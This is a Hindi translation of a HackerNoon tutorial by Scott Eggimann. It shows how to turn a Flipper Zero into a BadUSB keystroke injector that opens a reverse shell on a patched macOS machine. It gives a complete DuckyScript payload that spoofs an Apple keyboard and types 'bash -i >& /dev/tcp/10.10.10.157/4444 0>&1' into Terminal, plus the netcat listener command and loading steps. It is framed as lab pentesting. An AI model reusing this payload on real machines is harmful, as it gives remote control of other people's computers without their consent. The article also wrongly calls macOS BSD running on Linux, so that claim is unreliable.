paint-brush
कैसे एक फ्लिपर जीरो को बैडयूएसबी के रूप में उपयोग करके macOS पर एक रिवर्स शेल प्राप्त करेंद्वारा@fatman
34,263 रीडिंग
34,263 रीडिंग

कैसे एक फ्लिपर जीरो को बैडयूएसबी के रूप में उपयोग करके macOS पर एक रिवर्स शेल प्राप्त करें

द्वारा Scott Eggimann5m2022/12/05
Read on Terminal Reader

बहुत लंबा; पढ़ने के लिए

फ़्लिपर ज़ीरो, एक छोटी डकीस्क्रिप्ट टेक्स्ट फ़ाइल और उबंटू सर्वर पर एक दूरस्थ श्रोता का उपयोग करके मैं अपने मैक कंप्यूटर पर एक शेल हासिल करने में सक्षम था।
featured image - कैसे एक फ्लिपर जीरो को बैडयूएसबी के रूप में उपयोग करके macOS पर एक रिवर्स शेल प्राप्त करें
Scott Eggimann HackerNoon profile picture

फ़्लिपर ज़ीरो, एक छोटी 12-लाइन वाली डकीस्क्रिप्ट टेक्स्ट फ़ाइल और मेरे उबंटु सर्वर पर एक दूरस्थ श्रोता का उपयोग करके मैं अपने पूरी तरह से पैच किए गए, अप-टू-डेट वेंचुरा macOS कंप्यूटर पर एक शेल हासिल करने में सक्षम था।


अपने प्रयोगशाला वातावरण में, मैं अपने सर्वर और डेस्कटॉप सिस्टम में कमजोरियों का परीक्षण करने के लिए फ्लिपर ज़ीरो को एक पेन्टिंग डिवाइस के रूप में उपयोग करता हूं।


फ़्लिपर ज़ीरो हमारा पसंदीदा एथिकल हैकिंग टूल है क्योंकि यह अंतहीन संख्या में उपलब्ध पेलोड प्रदान करता है, इसमें ऑन-स्क्रीन मेनू चयन टूल है, और फीडबैक प्रदान करने के लिए प्रगति डिस्प्ले का उपयोग करता है।


यह लेख इस बात का उदाहरण है कि फ़्लिपर ज़ीरो को एथिकल पेंटेस्टिंग बैडयूएसबी डिवाइस के रूप में कैसे इस्तेमाल किया जाए और इस तरह के शोषण का शिकार बनने से कैसे बचा जाए। इसका उपयोग उन कंप्यूटरों पर न करें जिनके आप स्वामी नहीं हैं या जिन्हें उपयोग करने की अनुमति नहीं है। यह कोड इंट्रूज़न डिटेक्शन सिस्टम्स (IDS), इंट्रूज़न प्रिवेंशन सिस्टम्स (IPS), नेटवर्क डिटेक्शन सिस्टम्स, फ़ायरवॉल या एंटी-वायरस (AV) सॉफ़्टवेयर से छिपाने का प्रयास नहीं करता है।

बैडयूएसबी पेलोड

फ़्लिपर ज़ीरो बैडयूएसबी और साथ ही कई अन्य बैडयूएसबी डिवाइस डकीस्क्रिप्ट में लिखे पेलोड का उपयोग करते हैं। कीबोर्ड इंजेक्शन हमले के परिणामस्वरूप कीस्ट्रोक करने के लिए एक सरल स्क्रिप्टिंग भाषा।


डकीस्क्रिप्ट पेलोड के लिए एक अच्छा प्रारंभिक संदर्भ बिंदु आधिकारिक Hak5 वेबसाइट है:

https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky . यहां आपको डकस्क्रिप्ट का उपयोग करने के उदाहरण और दस्तावेज मिलेंगे।

आइए कुछ डकीस्क्रिप्ट लिखें

आप पहले से तैयार स्क्रिप्ट का उपयोग कर सकते हैं, या आप अपनी खुद की स्क्रिप्ट लिखना सीख सकते हैं। हम आपको एक सरल चरण-दर-चरण पूर्वाभ्यास में macOS कंप्यूटर पर रिवर्स शेल का उपयोग करने का तरीका दिखाएंगे।


अपने पसंदीदा पाठ संपादक का उपयोग करें और निम्न पाठ दर्ज करें। macOS में डिफ़ॉल्ट रूप से TextEdit एप्लिकेशन इंस्टॉल होता है, इसलिए हम उसका उपयोग करेंगे।


ID 05ac:021e Apple:Keyboard

DELAY 1000

GUI SPACE

DELAY 200

STRING terminal

DELAY 200

ENTER

DELAY 1000

STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1

DELAY 1000

ENTER

DELAY 1000


इस पूर्वाभ्यास के लिए हमें डकीस्क्रिप्ट के बारे में बहुत कुछ जानने की आवश्यकता नहीं है, इसलिए हम उन कुछ कमांडों के बारे में जानेंगे जिनका उपयोग हमारी स्क्रिप्ट करती है। वास्तव में केवल पाँच अलग-अलग कमांड हैं जिनका हम उपयोग करते हैं।

आज्ञा

विवरण

आईडी 05एसी: 021ई ऐप्पल: कीबोर्ड

यह लाइन macOS को बताती है कि हमारा Flipper Zero वास्तव में एक Apple कीबोर्ड है। यदि आप इस लाइन का उपयोग नहीं करते हैं, तो macOS कीबोर्ड सेटअप असिस्टेंट डायलॉग प्रदर्शित करता है जिससे आपकी स्क्रिप्ट विफल हो जाएगी।

देरी

यह कमांड ऑपरेटिंग सिस्टम को कुछ समय के लिए प्रतीक्षा करने का निर्देश देता है। यदि हम इन विलंबों का उपयोग नहीं करते हैं, तो स्क्रिप्ट बहुत तेजी से चलेगी और विफल हो जाएगी।

जीयूआई स्पेस

'स्पॉटलाइट सर्च' विंडो खोलने के लिए Apple कमांड की और स्पेस बार दबाता है।

STRING टर्मिनल

स्पॉटलाइट खोज विंडो में स्ट्रिंग 'टर्मिनल' दर्ज करता है

प्रवेश करना

अपने कीबोर्ड पर ENTER या रिटर्न कुंजी दबाएं। ENTER कुंजी दबाने के बाद, macOS टर्मिनल विंडो (/एप्लीकेशन/यूटिलिटीज/टर्मिनल) लॉन्च करता है

STRING बैश -i >& /dev/tcp/10.10.10.157/4444 0>&1

यह आदेश टेक्स्ट को टर्मिनल विंडो में प्रवेश करता है जो पोर्ट 4444 पर 10.10.10.157 पर सुनने वाले नेटकैट सर्वर से कनेक्शन स्थापित करता है


IP पता 10.10.10.157 पर बदलें और पोर्ट 4444 को अपने सर्वर के IP पते और पोर्ट में बदलें।


इस फ़ाइल को अपनी डिस्क पर rev_shell_macos.txt के रूप में सहेजें। Flipper Zero पर badusb डायरेक्टरी के तहत कोई उपनिर्देशिका संगठन नहीं है, इसलिए यदि आप विभिन्न ऑपरेटिंग सिस्टम के लिए कई पेलोड का उपयोग कर रहे हैं, तो एक नामकरण सम्मेलन का उपयोग करें जो आपके लिए कुछ मायने रखता है ताकि आप जान सकें कि यह क्या करता है।

qflipper एप्लिकेशन इंस्टॉल करना

यदि आपने अभी तक क्यूफ्लिपर एप्लिकेशन इंस्टॉल नहीं किया है, तो आधिकारिक फ्लिपर जीरो अपडेट पेज पर जाएं और अपने ऑपरेटिंग सिस्टम के लिए इंस्टॉलर का चयन करें। पेज फर्मवेयर अपडेट पेज है, लेकिन नीचे क्यूफ्लिपर एप्लिकेशन इंस्टॉल करने के लिए लिंक हैं।


https://flipperzero.one/update

qflipper एप्लिकेशन इंस्टॉल करने के लिए अपने ऑपरेटिंग सिस्टम के निर्देशों का पालन करें।


फ्लिपर जीरो पर डकीस्क्रिप्ट प्राप्त करना

qflipper एप्लिकेशन खोलें और लाल रंग में हाइलाइट किए गए फ़ोल्डर आइकन का चयन करें।


सामग्री देखने के लिए एसडी कार्ड आइकन का चयन करें और डबल-क्लिक करें।



हमारे द्वारा पहले बनाई गई Rev_shell_macos.txt फ़ाइल को Badusb फ़ोल्डर में ढूंढें और खींचें।



जब फाइल कॉपी हो जाए तो अपने कंप्यूटर से Flipper Zero को हटा दें।

उलटे खोल का इंतजार है

फ़्लिपर ज़ीरो बैडयूएसबी सुसज्जित है और उपयोग के लिए तैयार है। लेकिन सबसे पहले, हमें अपने रिमोट श्रोता को अपने सर्वर पर स्थापित करने की आवश्यकता है। हमारे Ubuntu सर्वर पर, Netcat श्रोता को निम्नलिखित कमांड से शुरू करें:


$ nc -nlvp 4444


कमांड का ब्रेकडाउन निम्न तालिका में सूचीबद्ध है। आने वाले कनेक्शन की प्रतीक्षा करने के अलावा, आपको वास्तव में यह जानने की ज़रूरत नहीं है कि इस कमांड का उपयोग करने पर क्या हो रहा है।

आज्ञा

विकल्प

एनसी

नेटकैट कमांड

-एनएलवीपी

( n ) कोई DNS रिज़ॉल्यूशन नहीं, ( l ) आने वाले कनेक्शन के लिए सुनें, ( v ) वर्बोज़ आउटपुट, ( p ) पोर्ट

4444

सुनने के लिए पोर्ट नंबर



अब जब हमारा नेटकैट श्रोता तैयार है और आने वाले कनेक्शन की प्रतीक्षा कर रहा है, तो हम फ्लिपर ज़ीरो बैडयूएसबी हमले के साथ आगे बढ़ सकते हैं।

बैडयूएसबी रिवर्स शेल शुरू करना

कठिन हिस्सा किया जाता है। फ़्लिपर ज़ीरो बैडयूएसबी रिवर्स_शेल_मैकोस.टीएक्सटी फ़ाइल लिखी गई है, फ़्लिपर ज़ीरो में ले जाया गया है, और नेटकैट श्रोता एक कनेक्शन की प्रतीक्षा कर रहा है।


खराब USB मेनू का पता लगाएँ और रन बटन का चयन करें। अभी तक अपने Flipper Zero को अपने कंप्यूटर से कनेक्ट न करें। फ़्लिपर ज़ीरो आपको बताएगा कि आपके डिवाइस को कनेक्ट करने का समय कब है।


उस डकीस्क्रिप्ट फ़ाइल पर नेविगेट करें जिसे हमने पिछले चरण में कॉपी किया था। अगर आपको यह फ़ाइल दिखाई नहीं देती है तो आपने इसे गलत निर्देशिका में कॉपी किया है। Rev_shell_macos चुनें और रन बटन पर क्लिक करें।


जब आप Connect to USB अलर्ट देखते हैं, तो आप अपने Flipper Zero को अपने iMac या MacBook के USB पोर्ट से कनेक्ट कर सकते हैं। रन बटन पर क्लिक करें।


आप मुख्य विंडो में अपने BadUSB स्क्रिप्ट की प्रगति देख सकते हैं। एक बार जब स्थिति 100% तक पहुंच जाती है तो पेलोड पूरा हो जाता है और आप फ्लिपर जीरो को हटा सकते हैं।


यदि आप iMac के कंप्यूटर के मॉनिटर को देख रहे हैं तो आप शोषण देख सकते हैं क्योंकि यह डकीस्क्रिप्ट को निष्पादित करता है। हमारे उबंटू सर्वर पर नेटकैट श्रोता सफल अनुरोध के परिणाम प्रदर्शित करता है।

आपके कंप्यूटर का नियंत्रण

अब आपके पास रिवर्स शेल के माध्यम से macOS कंप्यूटर का नियंत्रण है। बीएसडी लिनक्स के एक संस्करण पर चल रहा है, आप यूनिक्स कमांड लाइन टूल्स और बाश खोल का उपयोग कर सकते हैं जैसे कि आप भौतिक आईमैक के कीबोर्ड पर बैठे थे।


आप फ़ाइल सिस्टम को नेविगेट करने और ऑपरेटिंग सिस्टम में हेरफेर करने के लिए नियमित लिनक्स कमांड जैसे कि whoami , pwd , ls , या cd का उपयोग कर सकते हैं।


अगले कदम

अब जब आपको यह समझ आ गया है कि फ़्लिपर ज़ीरो एक बैडयूएसबी डिवाइस के रूप में कैसे काम करता है, तो आप अपनी खुद की स्क्रिप्ट बना सकते हैं। Hak5 साइट या Google खोज के माध्यम से उपलब्ध कई डकीस्क्रिप्ट गिटहब रिपॉजिटरी में से एक का उपयोग अपनी खुद की डकीस्क्रिप्ट फ़ाइलों के लिए शुरुआती बिंदु के रूप में करें।


कानूनी और नैतिक रूप से कार्य करें। इस उपकरण का उपयोग उन उपकरणों पर करें जिनके आप स्वामी हैं या जिनके पास उपयोग करने की अनुमति है।